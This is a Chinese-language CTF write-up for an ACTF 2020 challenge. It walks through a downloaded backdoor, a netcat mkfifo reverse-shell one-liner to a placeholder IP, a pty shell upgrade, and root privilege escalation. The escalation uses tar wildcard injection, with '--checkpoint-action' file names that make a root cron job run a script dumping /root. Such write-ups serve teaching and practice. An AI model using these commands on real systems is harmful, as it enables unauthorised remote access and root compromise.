www.zip下载得到一个一句话的后门
连接上去。
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP port >/tmp/f
反弹shell
查看根目录下的flag_here得到
flag in /root/
actf:actf2020
下面那个应该是用户的账号密码
尝试su切换用户
$ su actf
su: must be run from a terminal
用python -c 'import pty;pty.spawn("/bin/bash")'切换到终端
然后su到actf用户
查看计划任务。得到
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/1 * * * * root /etc/cron.daily/backup
查看/etc/cron.daily/backup
#!/bin/sh
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done
脚本的意思就是将遍历home目录。将目录下的每个文件夹内的东西。备份到/etc/backups/home-$i.gz
搜索下tar提权
https://www.cnblogs.com/linuxsec/articles/10701392.html
echo 'cat /root/* > /tmp/flag' > shell.sh;chmod +x shell.sh
echo > "--checkpoint-action=exec=sh shell.sh"
echo > "--checkpoint=1"
然后到tmp查看flag就行了